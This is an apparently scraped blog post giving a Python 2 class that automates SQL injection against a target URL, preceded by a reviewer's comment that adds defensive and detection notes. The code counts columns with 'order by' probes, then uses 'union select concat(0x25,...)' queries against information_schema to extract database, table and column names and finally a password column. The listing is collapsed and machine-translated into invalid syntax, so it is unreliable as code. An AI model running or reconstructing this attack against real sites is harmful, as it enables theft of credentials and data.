MySQL Injection module
# NOTE(review): this listing reached the page collapsed onto two physical lines,
# with its identifiers altered by machine translation ("ImportUrllib",
# "forXinchRange", "Self"). It is not valid Python as shown and is kept verbatim
# below. The API names that are still recognisable (urllib.urlopen, string.join,
# print statements) are Python 2.
#
# What the visible text shows: a class that takes one URL and appends SQL
# fragments to its query string. It sends an "order by N" probe with N rising
# from 1, then "and 1=2 union select" requests in which each column is wrapped
# in concat(0x25, ..., 0x25) so the value can be cut out of the response between
# '%' markers. The later requests read information_schema.columns, with names
# passed as 0x-prefixed hex produced by binascii.b2a_hex.
#
# Defender's reading: every step depends on the application concatenating the
# request parameter into the SQL text. Binding the parameter (prepared
# statements / parameterized queries) and rejecting non-numeric input for
# numeric ids removes the injection point. A least-privilege database account
# limits what any remaining flaw can read.
#
# Detection: in web-server or WAF logs the same steps appear as a burst of
# requests to one URL, URL-encoded with %20 for spaces. They carry "order by"
# with increasing integers, "union select" together with "0x25", and references
# to "information_schema". These strings are usable as detection signatures.
#coding:gb2312ImportUrllibImportstringImportBinasciiImportReclassmysqlinject ():def __init__(Self,url): Self.db='database ()'Self.url=url#URLs to be testedSelf.dblen=0#the length of the databaseSelf.counts=0#Number of fieldsSelf.tables=[]#TableSelf.dbname="' #Detecting the version of a database defjudgeversion (self): page=Urllib.urlopen (Self.url). read () SQL=string.join ([Self.url,"%20and%20mid (Version (), =523%)"],"') Pagex=Urllib.urlopen (Self.url). Read ()ifpage==Pagex:Print 'MySQL version: >5' Else: Print 'MySQL version <5' #number of Detection fields defcolumncounts (self): page=Urllib.urlopen (Self.url). Read () forNinchRange (1,100): SQL=string.join ([Self.url,"%20order%20by%20", str (n)],"') Pagex=urllib.urlopen (SQL). Read ()ifN==1: ifpage==Pagex:Print 'You can use order by to guess' Else: Print 'cannot use order by to guess' Break Else: ifpage!=pagex:self.counts=n-1Print 'number of fields:', Self.counts Break ifself.counts==0:Print 'failed to guess the number of fields to solve!' #the current database name is burst and the database user definject5content (self,sql): URL=self.url+'%20and%201=2%20union%20select%20' forXinchRange (1,self.counts+1): ifX!=1: URL+=','URL+='concat (0x25,'URL+=SQL URL+=', 0x25)'Pagec=urllib.urlopen (URL). Read () Reg="%[a-z,0-9,a-z,., \-,\\,@,:]*%"Regob=Re.compile (Reg, re. Dotall) Result=Regob.findall (PAGEC)ifLen (result)! =0:strings=result[1] Strings=strings[1:len (strings)-1] returnStringsdefInject5tablenames (self,db): URL=self.url+'%20and%201=2%20union%20select%20' forXinchRange (1,self.counts+1): ifX!=1: URL+=','URL+='concat (0x25,'URL+='Group_concat (distinct+table_name)'URL+=', 0x25)'URL+='%20from%20information_schema.columns%20where%20table_schema='URL+=DB Pagec=urllib.urlopen (URL). Read () Reg="%[a-z,0-9,a-z,., \,,\-,\\,@,:]*%"Regob=Re.compile (Reg, re. Dotall) Result=Regob.findall (PAGEC)ifLen (result)! 
=0:strings=result[1] Strings=strings[1:len (strings)-1] s=strings.split (',') returns#To guess the field name defInject5columnsname (SELF,TB): URL=self.url+'%20and%201=2%20union%20select%20' forXinchRange (1,self.counts+1): ifX!=1: URL+=','URL+='concat (0x25,'URL+='Group_concat (distinct+column_name)'URL+=', 0x25)'URL+='%20from%20information_schema.columns%20where%20table_name='URL+=TB Pagec=urllib.urlopen (URL). Read () Reg="%[a-z,0-9,a-z,., \,,\-,\\,@,:]*%"Regob=Re.compile (Reg, re. Dotall) Result=Regob.findall (PAGEC)ifLen (result)! =0:strings=result[1] Strings=strings[1:len (strings)-1] s=strings.split (',') returns#Guess Field Contents definject5countcontent (SELF,TN,CN): URL=self.url+'%20and%201=2%20union%20select%20' forXinchRange (1,self.counts+1): ifX!=1: URL+=','URL+='concat (0x25,'URL+=CN URL+=', 0x25)'URL+='%20from%20'URL+=TN Pagex=urllib.urlopen (URL). Read () Reg="%[a-z,0-9,a-z,., \,,\-,\\,@,:]*%"Regob=Re.compile (Reg, re. Dotall) Result=Regob.findall (Pagex)ifLen (result)! =0:strings=result[1] Strings=strings[1:len (strings)-1] PrintCN,':', Strings#If the database version is greater than 4, you can use the ' check ' table method to inject defInject5 (self): D='database ()'Self.database=Self.inject5content (d)Printself.database database0x=Binascii.b2a_hex (self.database) database0x='0x'+database0xPrintdatabase0x self.inject5tablename (database0x) self.inject5tablenames (database0x) TB=Self.tables[0]Print "'TB=Binascii.b2a_hex (TB) TB='0x'+TBPrintTB Self.inject5columnsname (TB) self.inject5countcontent ('gly','Password')
Writing SQL injection tools in Python (3)